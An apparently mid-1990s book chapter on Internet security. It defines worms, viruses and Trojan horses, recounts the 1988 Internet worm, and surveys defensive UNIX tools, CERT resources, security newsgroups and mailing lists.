The definition of a computer worm is a program that can run by itself and propagate a fully working version of itself to other machines. The famous Internet worm that spread in November 1988 brought the Internet to a state of inoperability. It spread from machine to machine by exploiting a bug in the sendmail and fingerd programs. The worm attacked computers by trying to use easy-to-guess passwords such as Joes and attacked accounts using the owner's first or last name (available from the finger command to outside Internet users). The worm also used the standard online dictionary and a small dictionary of its own of commonly used passwords. A full description of the Internet worm can be found on the FTP server at Purdue University.
Fred Cohen of USC describes a computer virus as a section of programming code that adds itself to other computer programs. In other words, it modifies operating systems or running programs to include an evolved copy of itself. This section of code cannot run by itself and requires a host program before it can replicate. Virus programs are common in the PC computer world, and many off-the-shelf vendor solutions are offered to keep your personal computer free from viral infections. If you are interested in looking into these bizarre creatures of computer vandalism, start with the FAQ for the Usenet newsgroup comp.virus or the mail list VIRUS-L (both groups are identical except that one is a newsgroup and the other is a mail list).
Another form of vandalware is the Trojan horse. A program that does something its programmer wants done but that the user would not allow is often called a Trojan horse. A few months ago, a Trojan horse showed up on a computer system. The beast was a modified version of the Telnet daemon that did everything the normal Telnet daemon should do, including asking users for their passwords when they logged in to the system. This special version not only asked users for their passwords, it also collected these passwords in a hidden file on the system. The intruder expected to come back and collect these passwords to break into other accounts and systems on our network.
Other vandalware terms you may see referenced on the Internet are rabbits (which spread wildly within or among computer systems, disrupting network traffic) and bacterium (whose main goal is to replicate in a system and consume CPU time until the computer is halted).
There are programs freely available on the Internet to enhance the security of your computer system. Most of the packages are designed for the UNIX operating system because it is the most commonly attached computer on the Internet. UNIX hosts are typically used as bastion hosts and gateways.
The COPS package contains a variety of scripts to form a security testing system. It addresses common security holes and can be run at regular intervals to ensure that your system is secure. The package includes the Kuang expert system, which takes a set of rules and tries to break into your system like a malicious user would. It then reports on your security weaknesses.
One version is written in perl, another is written in shell scripts and C. Both versions are continually modified to include recent UNIX security holes. The configuration of the package is fairly easy and can be installed without having a degree in computer science. The package, currently maintained by Dan Farmer, is available at archive.cis.ohio-state.edu: /pub/cops. It was originally developed under the direction of Gene Spafford at Purdue University.
CRACK was written by Alec Muffett to break insecure passwords. It can be used both by the cracker to break into systems and by the administrator to check the integrity of the password file. It has a friendly front-end interface and a networking option to spread the load over various computers on the network.
UFC, written by Michael Glad, is a fast version of the crypt algorithm. It can be combined with CRACK to enhance the ability to check easy-to-guess passwords.
CRACK and UFC are available from FTP.uu.net:/usenet/comp.sources.misc/volume28.
NOTE It has been debated for some time whether to make these tools readily available on the Internet to irresponsible and malicious people. Logic dictates that it is more important for system administrators to readily have these tools than the bad guys. Most crackers have had these tools for years, anyway.
The NPASSWD and Passwd+ programs provide a replacement for the UNIX passwd command that is used to change a user's password. The programs try to prevent a user from choosing a poor password that a program like CRACK could break. NPASSWD was written by Clyde Hoover; Passwd+ was written by Matt Bishop. Use the Internet service Archie to find the most recent versions of these programs.
William LeFebvre enhanced the security of three UNIX kernel calls to check for "allowed" hosts before permitting network connections to your Internet host. The latest version of these library routines is stored at eecs.nwu.edu: /pub/securelib.tar.
Shadow is a set of program replacements for your UNIX system. It keeps the password entry in a separately guarded file rather than in the normal password file. Shadow also provides for terminal access control and includes user and group administration. Written by John F. Haugh II, it is available from FTP.uu.net: /usenet/comp.sources.misc/volume38/shadow.
TCP Wrappers provides a front-end filtering capability to many of the network services in the UNIX operating system. The extra logging information it provides can help detect an intruder who is trying to break into your Internet system. The package can also be set up to prevent illegitimate connections from being made to your computer. TCP Wrappers was designed by Wietse Venema of the Eindhoven University of Technology, the Netherlands. You can obtain TCP Wrappers from ftp://ftp.cert.org: /pub/network_tools/tcp_wrappers_7.2.tar.
Make sure that you prepare a handout for all your Internet account users. Users should know what the acceptable use of the Internet is and the conduct that is ethically accepted. They should be aware of the security problems weak passwords represent and should be educated on keeping their account secure. You should provide a list of contacts just in case someone detects a security problem on the system or sees some peculiar activity. A copy of your site security policy should be available at all times.
By using many of the information tools found in this chapter, you should be able to locate quite a bit of information about security. If you get stuck and need information, try to find a Gopher server with Veronica and run the query security.
One of the first places to look for security information is from CERT. You can use the FTP (File Transfer Protocol) network tool to retrieve information from the site cert.org. The first file to download should be CERT.FAQ (CERT Frequently Asked Questions). This file includes information about how the information is organized on the CERT file server cert.org.
The following is a list of Usenet newsgroups that discuss security-related issues:
Newsgroup               Description
alt.security            This forum discusses computer security but also includes other issues such as car locks and alarm systems.
comp.security.announce  This list is used to distribute CERT security advisories.
comp.security.misc      A forum for the discussion of computer security (tends to be related to UNIX security issues).
comp.virus              This newsgroup discusses computer virus issues.
comp.risks              This forum discusses the risks to the public from computers and related systems.
A few Internet mailing lists can provide you with updated information about computer security. The Computer Emergency Response Team Coordination Center (CERT/CC) has established a list for the purpose of exchanging information and security tools and techniques. Membership is restricted to system programmers, system administrators, and others with legitimate interest in computer security tools. An administrator can subscribe by sending e-mail to cert-tools-request@cert.org. Other CERT mailing lists include a security advisory list called cert-advisory. You can join this list by sending e-mail to cert-advisory-request@cert.org.
Another security-related mail list is VIRUS-L, which focuses on computer virus issues. You can subscribe by sending the string SUB VIRUS-L and your name in the body of an e-mail message to listserv@lehigh.edu. A similar list named VALERT-L exists at the same location and is used for sending urgent virus-related warnings to computer users. To join, send the string SUB VALERT-L and your name in the body of an e-mail message to listserv@lehigh.edu.
New organizations are being formed every day to deal with the security-related threats on the Internet. CERT has been mentioned a number of times in this chapter. Other organizations include COAST, FIRST, ASIS, CSI, NIST, and the CIAC. All these organizations are designed to help the system administrator manage a usable system that is secure.
COAST (Computer Operations, Audit, and Security Tools) is a project coordinated by Gene Spafford at the Department of Computer Sciences at Purdue University. The goal of this project is to create a research program that explores new approaches to computer security and computer system management. Further information can be obtained from ftp://coast.cs.purdue.edu/pub/Purdue/papers/spafford.
REFERENCE WORKS
